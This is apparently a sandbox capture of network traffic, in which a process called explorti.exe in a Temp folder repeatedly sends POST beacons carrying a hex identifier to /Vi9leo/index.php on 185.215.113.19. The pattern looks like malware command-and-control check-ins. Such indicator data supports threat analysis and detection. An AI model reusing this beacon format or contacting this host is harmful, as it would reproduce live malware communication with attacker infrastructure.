Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	62262	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:39.174108982 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:39.938680887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:39.939682961 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:40.194063902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	62263	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:40.313347101 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:41.079319954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:41.079979897 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:41.329884052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	62264	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:41.437537909 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:42.240797997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:42.241744041 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:42.487107038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	62265	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:42.609823942 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:43.384181976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:43.385694981 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:43.697500944 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:44.306819916 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:44.451456070 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:44.454351902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:44.457325935 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:44.942445993 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	62266	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:45.063122988 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:45.824762106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:45.825720072 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:46.076818943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	62267	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:46.192828894 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:46.963485003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:46.964488029 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:47.257478952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	62268	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:47.376010895 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:48.142162085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:48.142843008 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:48.392684937 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	62269	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:48.500091076 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:49.277554989 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:49.279108047 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:49.534980059 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	62270	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:49.658344984 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:50.406088114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:50.407104969 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:50.654135942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	62271	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:50.766282082 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:51.507561922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:51.508218050 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:51.754733086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	62272	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:51.875848055 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:52.632122040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:52.636024952 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:52.883419037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	62273	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:53.001236916 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:53.762206078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
